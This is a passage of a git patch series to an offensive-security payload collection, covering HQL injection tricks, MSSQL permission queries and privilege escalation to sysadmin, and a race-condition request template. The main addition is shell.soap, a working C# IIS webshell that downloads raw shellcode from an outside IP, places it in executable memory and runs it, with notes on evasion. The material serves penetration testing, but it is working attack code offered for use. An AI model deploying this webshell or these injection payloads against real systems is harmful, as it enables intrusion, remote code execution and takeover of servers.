+Method works for DBMS which allow UNICODE delimiters (Ex. U+00A0) between SQL tokens: Microsoft SQL Server, H2.
+
+In Microsoft SQL SERVER `SELECT LEN([U+00A0](select[U+00A0](1))` works the same as `SELECT LEN((SELECT(1)))`;
+
+HQL allows UNICODE symbols in identifiers (function or parameter names).
+
+```
+SELECT p FROM hqli.persistent.Post p where p.name='dummy' or 1<LEN( (select top 1 name from users)) or '1'='11'
+```
+
+## Java constants
+
+Method works for most DBMS (does not work for MySQL).
+
+Hibernate resolves Java public static fields (Java constants) in HQL queries:
+
+- Class with Java constant must be in classpath
+- Ex. `java.lang.Character.SIZE` is resolved to 16
+- String or char constants are additionally surrounded by single quotes
+
+To use JAVA CONSTANTS method we need special char or  string fields declared in classes or interfaces on classpath.
+
+```java
+public class Constants {
+    public static final String S_QUOTE = "'";
+    public static final String HQL_PART = "select * from Post where name = '";
+    public static final char C_QUOTE_1 = '\'';
+    public static final char C_QUOTE_2 = '\047';
+    public static final char C_QUOTE_3 = 39;
+    public static final char C_QUOTE_4 = 0x27;
+    public static final char C_QUOTE_5 = 047;
+}
+```
+
+Some usable constants in well-known Java libraries:
+
+```
+org.apache.batik.util.XMLConstants.XML_CHAR_APOS         [ Apache Batik ]
+com.ibm.icu.impl.PatternTokenizer.SINGLE_QUOTE           [ ICU4J ]
+jodd.util.StringPool.SINGLE_QUOTE                        [ Jodd ]
+ch.qos.logback.core.CoreConstants.SINGLE_QUOTE_CHAR      [ Logback ]
+cz.vutbr.web.csskit.OutputUtil.STRING_OPENING            [ jStyleParser ]
+com.sun.java.help.impl.DocPConst.QUOTE                   [ JavaHelp ]
+org.eclipse.help.internal.webapp.utils.JSonHelper.QUOTE  [ EclipseHelp ]
+```
+
+```
+dummy' and hqli.persistent.Constants.C_QUOTE_1*X('<>CHAR(41) and (select count(1) from sysibm.sysdummy1)>0 --')=1 and '1'='1
+```
+
+## Methods by DBMS
+
+![image](https://user-images.githubusercontent.com/16578570/163428666-a22105a8-287c-4997-8aef-8f372a1b86e9.png)
+
 ## References
 
 * [HQL for pentesters - February 12, 2014 - Philippe Arteau](https://blog.h3xstream.com/2014/02/hql-for-pentesters.html)
 * [How to put a comment into HQL (Hibernate Query Language)? - Thomas Bratt](https://stackoverflow.com/questions/3196975/how-to-put-a-comment-into-hql-hibernate-query-language)
 * [HQL : Hyperinsane Query Language - 04/06/2015 - Renaud Dubourguais](https://www.synacktiv.com/ressources/hql2sql_sstic_2015_en.pdf)
 * [ORM2Pwn: Exploiting injections in Hibernate ORM - Nov 26, 2015 - Mikhail Egorov](https://www.slideshare.net/0ang3el/orm2pwn-exploiting-injections-in-hibernate-orm)
+* [New Methods for Exploiting ORM Injections in Java Applications - HITBSecConf2016 - Mikhail Egorov - Sergey Soldatov](https://conference.hitb.org/hitbsecconf2016ams/materials/D2T2%20-%20Mikhail%20Egorov%20and%20Sergey%20Soldatov%20-%20New%20Methods%20for%20Exploiting%20ORM%20Injections%20in%20Java%20Applications.pdf)
 * [HQL Injection Exploitation in MySQL - July 18, 2019 - Olga Barinova](https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/hql-injection-exploitation-in-mysql/)

From c274874430ac09ec432eb28d21285b55fe9d0fd7 Mon Sep 17 00:00:00 2001
From: Alexandre ZANNI <16578570+noraj@users.noreply.github.com>
Date: Mon, 18 Apr 2022 17:21:26 +0200
Subject: [PATCH 16/20] MSSQL: list permissions

---
 SQL Injection/MSSQL Injection.md | 30 ++++++++++++++++++++++++++++++
 1 file changed, 30 insertions(+)

diff --git a/SQL Injection/MSSQL Injection.md b/SQL Injection/MSSQL Injection.md
index 920e2ac3..ce645d4b 100644
--- a/SQL Injection/MSSQL Injection.md	
+++ b/SQL Injection/MSSQL Injection.md	
@@ -23,6 +23,7 @@
     * [MSSQL UNC path](#mssql-unc-path)
 * [MSSQL Make user DBA](#mssql-make-user-dba-db-admin)
 * [MSSQL Trusted Links](#mssql-trusted-links)
+* [MSSQL List permissions](#mssql-list-permissions)
 
 ## MSSQL Comments
 
@@ -297,6 +298,33 @@ EXECUTE('EXECUTE(''CREATE LOGIN hacker WITH PASSWORD = ''''P@ssword123.'''' '')
 EXECUTE('EXECUTE(''sp_addsrvrolemember ''''hacker'''' , ''''sysadmin'''' '') AT "DOMINIO\SERVER1"') AT "DOMINIO\SERVER2"
 ```
 
+## List permissions
+
+Listing effective permissions of current user on the server.
+
+```sql
+SELECT * FROM fn_my_permissions(NULL, 'SERVER'); 
+```
+
+Listing effective permissions of current user on the database.
+
+```sql
+SELECT * FROM fn_my_permissions (NULL, 'DATABASE');
+```
+
+Listing effective permissions of current user on a view.
+
+```
+SELECT * FROM fn_my_permissions('Sales.vIndividualCustomer', 'OBJECT') ORDER BY subentity_name, permission_name; 
+```
+
+Check if current user is a member of the specified server role.
+
+```sql
+-- possible roles: sysadmin, serveradmin, dbcreator, setupadmin, bulkadmin, securityadmin, diskadmin, public, processadmin
+SELECT is_srvrolemember('sysadmin');
+```
+
 ## References
 
 * [Pentest Monkey - mssql-sql-injection-cheat-sheet](http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet)
@@ -306,3 +334,5 @@ EXECUTE('EXECUTE(''sp_addsrvrolemember ''''hacker'''' , ''''sysadmin'''' '') AT
 * [DAFT: Database Audit Framework & Toolkit - NetSPI](https://github.com/NetSPI/DAFT)
 * [SQL Server UNC Path Injection Cheatsheet - nullbind](https://gist.github.com/nullbind/7dfca2a6309a4209b5aeef181b676c6e)
 * [Full MSSQL Injection PWNage - ZeQ3uL && JabAv0C - 28 January 2009](https://www.exploit-db.com/papers/12975)
+* [Microsoft - sys.fn_my_permissions (Transact-SQL)](https://docs.microsoft.com/en-us/sql/relational-databases/system-functions/sys-fn-my-permissions-transact-sql?view=sql-server-ver15)
+* [Microsoft - IS_SRVROLEMEMBER (Transact-SQL)](https://docs.microsoft.com/en-us/sql/t-sql/functions/is-srvrolemember-transact-sql?view=sql-server-ver15)

From 1a5537a04494ac1767c8a75f372066a78fe72b39 Mon Sep 17 00:00:00 2001
From: Swissky <12152583+swisskyrepo@users.noreply.github.com>
Date: Mon, 18 Apr 2022 20:58:14 +0200
Subject: [PATCH 17/20] Add warning about cPickle

---
 Insecure Deserialization/Python.md | 1 +
 1 file changed, 1 insertion(+)

diff --git a/Insecure Deserialization/Python.md b/Insecure Deserialization/Python.md
index 98e843e7..563db1cf 100644
--- a/Insecure Deserialization/Python.md	
+++ b/Insecure Deserialization/Python.md	
@@ -3,6 +3,7 @@
 ## Pickle
 
 The following code is a simple example of using `cPickle` in order to generate an auth_token which is a serialized User object.
+:warning: `import cPickle` will only work on Python 2
 
 ```python
 import cPickle

From 578ea4d12b45f607d384ce912682c2adb2f4666c Mon Sep 17 00:00:00 2001
From: Swissky <12152583+swisskyrepo@users.noreply.github.com>
Date: Mon, 18 Apr 2022 21:32:54 +0200
Subject: [PATCH 18/20] SOAP File Upload

---
 .../Extension ASP/shell.soap                  | 55 +++++++++++++++++++
 Upload Insecure Files/README.md               |  5 +-
 2 files changed, 58 insertions(+), 2 deletions(-)
 create mode 100644 Upload Insecure Files/Extension ASP/shell.soap

diff --git a/Upload Insecure Files/Extension ASP/shell.soap b/Upload Insecure Files/Extension ASP/shell.soap
new file mode 100644
index 00000000..dcac007d
--- /dev/null
+++ b/Upload Insecure Files/Extension ASP/shell.soap	
@@ -0,0 +1,55 @@
+<%@ WebService Language="C#" class="SoapStager"%>
+using System;
+using System.IO;
+using System.Web;
+using System.Web.Services;
+using System.Net;
+using System.Net.NetworkInformation;
+using System.Net.Security;
+
+// SRC: https://red.0xbad53c.com/red-team-operations/initial-access/webshells/iis-soap
+// https://github.com/0xbad53c/webshells/tree/main/iis
+
+[WebService(Namespace = "http://microsoft.com/" ,Description ="SOAP Stager Webshell" , Name ="SoapStager")]
+[WebServiceBinding(ConformsTo = WsiProfiles.BasicProfile1_1)]
+public class SoapStager : MarshalByRefObject
+{
+	private static Int32 MEM_COMMIT=0x1000;
+	private static IntPtr PAGE_EXECUTE_READWRITE=(IntPtr)0x40;
+
+	[System.Runtime.InteropServices.DllImport("kernel32")]
+	private static extern IntPtr VirtualAlloc(IntPtr lpStartAddr,UIntPtr size,Int32 flAllocationType,IntPtr flProtect);
+
+	[System.Runtime.InteropServices.DllImport("kernel32")]
+	private static extern IntPtr CreateThread(IntPtr lpThreadAttributes,UIntPtr dwStackSize,IntPtr lpStartAddress,IntPtr param,Int32 dwCreationFlags,ref IntPtr lpThreadId);
+
+
+    [System.ComponentModel.ToolboxItem(false)]
+    [WebMethod]
+    public string loadStage()
+    {
+        string Url = "http://10.90.255.52/beacon.bin"; //your IP and location of meterpreter or other raw shellcode
+        byte[] rzjUFlLZh;
+
+        IWebProxy defaultWebProxy = WebRequest.DefaultWebProxy;
+        defaultWebProxy.Credentials = CredentialCache.DefaultCredentials;
+
+        // in case of HTTPS
+        using (WebClient webClient = new WebClient() { Proxy = defaultWebProxy })
+        {
+            ServicePointManager.SecurityProtocol = (SecurityProtocolType)3072;
+            ServicePointManager.ServerCertificateValidationCallback = new RemoteCertificateValidationCallback(delegate { return true; });
+            webClient.UseDefaultCredentials = true;
+            rzjUFlLZh = webClient.DownloadData(Url);
+        }
+
+
+        // Feel free to improve to PAGE_READWRITE & direct syscalls for more evasion
+        IntPtr fvYV5t = VirtualAlloc(IntPtr.Zero,(UIntPtr)rzjUFlLZh.Length,MEM_COMMIT, PAGE_EXECUTE_READWRITE);
+        System.Runtime.InteropServices.Marshal.Copy(rzjUFlLZh,0,fvYV5t,rzjUFlLZh.Length);
+        IntPtr owlqRoQI_ms = IntPtr.Zero;
+        IntPtr vnspR2 = CreateThread(IntPtr.Zero,UIntPtr.Zero,fvYV5t,IntPtr.Zero,0,ref owlqRoQI_ms);
+
+        return "finished";
+    }
+}
\ No newline at end of file
diff --git a/Upload Insecure Files/README.md b/Upload Insecure Files/README.md
index 0c633a0b..0ccaea3f 100644
--- a/Upload Insecure Files/README.md	
+++ b/Upload Insecure Files/README.md	
@@ -43,7 +43,7 @@
     .phtm
     .inc
     ```
-* ASP Server : `.asp, .aspx, .cer and .asa (IIS <= 7.5), shell.aspx;1.jpg (IIS < 7.0)`
+* ASP Server : `.asp, .aspx, .cer and .asa (IIS <= 7.5), shell.aspx;1.jpg (IIS < 7.0), shell.soap`
 * JSP : `.jsp, .jspx, .jsw, .jsv, .jspf`
 * Perl: `.pl, .pm, .cgi, .lib`
 * Coldfusion: `.cfm, .cfml, .cfc, .dbm`
@@ -143,4 +143,5 @@ When a ZIP/archive file is automatically decompressed after the upload
 * [Encoding Web Shells in PNG IDAT chunks, 04-06-2012, phil](https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/)
 * [La PNG qui se prenait pour du PHP, 23 février 2014](https://phil242.wordpress.com/2014/02/23/la-png-qui-se-prenait-pour-du-php/)
 * [File Upload restrictions bypass - Haboob Team](https://www.exploit-db.com/docs/english/45074-file-upload-restrictions-bypass.pdf)
-* [File Upload - Mahmoud M. Awali / @0xAwali](https://docs.google.com/presentation/d/1-YwXl9rhzSvvqVvE_bMZo2ab-0O5wRNTnzoihB9x6jI/edit#slide=id.ga2ef157b83_1_0)
\ No newline at end of file
+* [File Upload - Mahmoud M. Awali / @0xAwali](https://docs.google.com/presentation/d/1-YwXl9rhzSvvqVvE_bMZo2ab-0O5wRNTnzoihB9x6jI/edit#slide=id.ga2ef157b83_1_0)
+* [IIS - SOAP](https://red.0xbad53c.com/red-team-operations/initial-access/webshells/iis-soap)
\ No newline at end of file

From 6738f878f39107f15e0c5220bb5ddc765843fd75 Mon Sep 17 00:00:00 2001
From: idealphase <mynameisphase@gmail.com>
Date: Tue, 19 Apr 2022 10:45:32 +0700
Subject: [PATCH 19/20] Updated README.md

Added References: Bypassing Signature-Based XSS Filters: Modifying Script Code
---
 XSS Injection/README.md | 1 +
 1 file changed, 1 insertion(+)

diff --git a/XSS Injection/README.md b/XSS Injection/README.md
index 9d68654f..8309a2dd 100644
--- a/XSS Injection/README.md	
+++ b/XSS Injection/README.md	
@@ -1255,3 +1255,4 @@ anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxld
 - [mXSS Attacks: Attacking well-secured Web-Applications by using innerHTML Mutations - Mario Heiderich, Jörg Schwenk, Tilman Frosch, Jonas Magazinius, Edward Z. Yang](https://cure53.de/fp170.pdf)
 - [Self Closing Script](https://twitter.com/PortSwiggerRes/status/1257962800418349056)
 - [Bypass < with ＜](https://hackerone.com/reports/639684)
+- [Bypassing Signature-Based XSS Filters: Modifying Script Code](https://portswigger.net/support/bypassing-signature-based-xss-filters-modifying-script-code)

From 9f9fbe4fe56347b2a9f4f84e850fbd612f841db2 Mon Sep 17 00:00:00 2001
From: idealphase <mynameisphase@gmail.com>
Date: Tue, 19 Apr 2022 11:06:34 +0700
Subject: [PATCH 20/20] Updated Race Condition README.md

Added Turbo Intruder 2 Requests Examples use when the window may only be a few milliseconds.
---
 Race Condition/README.md | 33 ++++++++++++++++++++++++++++++++-
 1 file changed, 32 insertions(+), 1 deletion(-)

diff --git a/Race Condition/README.md b/Race Condition/README.md
index 2e70df87..1986c47e 100644
--- a/Race Condition/README.md	
+++ b/Race Condition/README.md	
@@ -41,9 +41,40 @@
 3. Now set the external HTTP header x-request: %s - :warning: This is needed by the turbo intruder
 4. Click "Attack"
 
+## Turbo Intruder 2 Requests Examples
+This follwoing template can use when use have to send race condition of request2 immediately after send a request1 when the window may only be a few milliseconds.
+```python
+def queueRequests(target, wordlists): 
+    engine = RequestEngine(endpoint=target.endpoint, 
+                           concurrentConnections=30, 
+                           requestsPerConnection=100, 
+                           pipeline=False 
+                           ) 
+    request1 = '''
+POST /target-URI-1 HTTP/1.1
+Host: <REDACTED>
+Cookie: session=<REDACTED>
+
+parameterName=parameterValue
+    ''' 
+
+    request2 = '''
+GET /target-URI-2 HTTP/1.1
+Host: <REDACTED>
+Cookie: session=<REDACTED>
+    '''
+
+    engine.queue(request1, gate='race1')
+    for i in range(30): 
+        engine.queue(request2, gate='race1') 
+    engine.openGate('race1') 
+    engine.complete(timeout=60) 
+def handleResponse(req, interesting): 
+    table.add(req)
+```
 
 ## References
 
 * [Race Condition allows to redeem multiple times gift cards which leads to free "money" - @muon4](https://hackerone.com/reports/759247)
 * [Turbo Intruder: Embracing the billion-request attack - James Kettle | 25 January 2019](https://portswigger.net/research/turbo-intruder-embracing-the-billion-request-attack)
-* [Race Condition Bug In Web App: A Use Case - Mandeep Jadon](https://medium.com/@ciph3r7r0ll/race-condition-bug-in-web-app-a-use-case-21fd4df71f0e)
\ No newline at end of file
+* [Race Condition Bug In Web App: A Use Case - Mandeep Jadon](https://medium.com/@ciph3r7r0ll/race-condition-bug-in-web-app-a-use-case-21fd4df71f0e)